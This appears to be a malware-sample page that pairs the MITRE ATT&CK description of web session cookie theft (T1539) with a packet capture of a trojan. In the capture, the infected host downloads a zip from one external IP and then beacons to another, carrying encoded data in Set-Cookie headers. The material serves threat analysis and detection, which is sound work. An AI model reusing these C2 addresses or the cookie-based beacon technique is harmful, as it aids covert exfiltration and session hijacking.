APT TrojanCookies Malware Traffic Sample Trojan PCAP Download


Acronis Cyber Protect

Steal Web Session Cookie

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.[1]

There are several examples of malware targeting cookies from web browsers on the local system.[2][3] There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns.[4][5]

After an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.

ID: T1539

Sub-techniques:  No sub-techniques

Tactic: Credential Access

Platforms: Google Workspace, Linux, Office 365, SaaS, Windows, macOS

Permissions Required: User

Contributors: Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)

Version: 1.2

Created: 08 October 2019

Last Modified: 28 July 2021

Version Permalink

Procedure Examples

IDNameDescription
G0016APT29APT29 has stolen Chrome browser cookies by copying the Chrome profile directories of targeted users
2013-01-05 22:41:53.771374 IP 172.16.253.130.1092 > 117.55.241.58.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279: HTTP: GET /indexs.zip HTTP/1.1
E..?.a@….R….u7.:.D.P…\..A P…S…GET /indexs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive
2013-01-05 22:41:53.771571 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [.], ack 280, win 64240, length 0
E..(-]…..mu7.:…..P.D..A …sP………….
2013-01-05 22:41:54.094611 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [P.], seq 1:1461, ack 280, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…-^……u7.:…..P.D..A …sP…….HTTP/1.1 200 OK
Content-Length: 114696
Content-Type: application/x-zip-compressed
Last-Modified: Thu, 24 Jan 2013 07:08:57 GMT
Accept-Ranges: bytes
ETag: “36c67bad1facd1:1c6d3”
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 30 Jan 2013 03:34:42 GMT
2013-01-05 22:41:57.398529 IP 172.16.253.130.1093 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.E.P.`……P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AQ8cIykwOUBGTVRaZGpxd37VYTR4d1mOKAnsKi5caRjlbe8Dnh66ZuvW9XyoBCJGTSRWPigvIUHsIR3KjiXZNqeIjqyoUwJPSMohKy+8+p0ugEk2gnrQvSJKWfkuLamQov0ILFxX//BehMNEX3P4sOrSF4JKBvtaAQaBTA1/PaelJ17yqMkdURSqcR7snK6L7gAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
2013-01-05 22:41:58.609637 IP 172.16.253.130.1094 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.F.P7.D…m.P….\..GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AS5FUmNzg5CdscHO3Oz5CRbgmGZDAAnR7DFrbz9E22Ec8Fm3TRQV0fMySmECZO4MJct0A/K6WUNPeWyWYN7e91aeoWH5nVS2DtVtnY7ZVqj5SBHaCmHn2Ipqxu5PTcJvpaTJYehJMefihOCyJgJjaFZDPOUi2c/I2sqYIh6vJk2YuTNwQtHwNjgstq58DxYTjgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
2013-01-05 22:41:59.422085 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@………..D\D\.I..{“host_int”: 356675228, “version”: [1, 8], “displayname”: “356675228”, “port”: 17500, “namespaces”: [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:41:59.703740 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [S], seq 209564213, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…ok……)
.G.P.}.5….p…:1……….
2013-01-05 22:41:59.811449 IP 184.22.41.10.80 > 172.16.253.130.1095: Flags [S.], seq 2093017231, ack 209564214, win 64240, options [mss 1460], length 0
E..,-……`..)
…..P.G|….}.6`………….
2013-01-05 22:41:59.811507 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…or……)
.G.P.}.6|…P…….
2013-01-05 22:41:59.811859 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.G.P.}.6|…P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: Aej4BRIfLDZDUF1qd4GOm6V0pE/nx2gMQgXnTabLrDG/gIVTURAa6iAdP5+uybCFbWBsTi99Ceg0paBJIJJ8SwJ/jRmTSHDoupkThSRwTsNJkwR8wfyR8YV+1xD8iz+kzR1CtrfR7olzp2dsnp+Wgyu1WCjeo7bsMG4nGq6DHAyFi2qk/Rzh5YLoM+bwQN2+ZgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
 
2013-01-05 22:42:29.443499 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@..m……..D\D\.I..{“host_int”: 356675228, “version”: [1, 8], “displayname”: “356675228”, “port”: 17500, “namespaces”: [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:42:30.173010 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [S], seq 1965195895, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…oN……)
.P.Pu”.w….p….A……….
2013-01-05 22:42:30.280498 IP 184.22.41.10.80 > 172.16.253.130.1104: Flags [S.], seq 3239884347, ack 1965195896, win 64240, options [mss 1460], length 0
E..,-……G..)
…..P.P…;u”.x`………….
2013-01-05 22:42:30.280566 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…oU……)
.P.Pu”.x…<P…….
2013-01-05 22:42:30.280868 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…mp……)
.P.Pu”.x…<P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AR0uO0RRX2h1f4yZo7C9x9QYPVyZXtpP+RD9ajqe1y4uj2IpzAeer9zbGYcLK2X7whwmbN3qvn023RzcnGBgL95kqq62vc/yFd8TnWFxQRysDDYxTmW91Xdpjo8UWn8wB6m1AiWaS5Ya4e0WTCFlCE4Yep6yro43ijU8tUpocsHX5OK3zQ4s1Qb7TAIAuhdumAAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache


Leave a Comment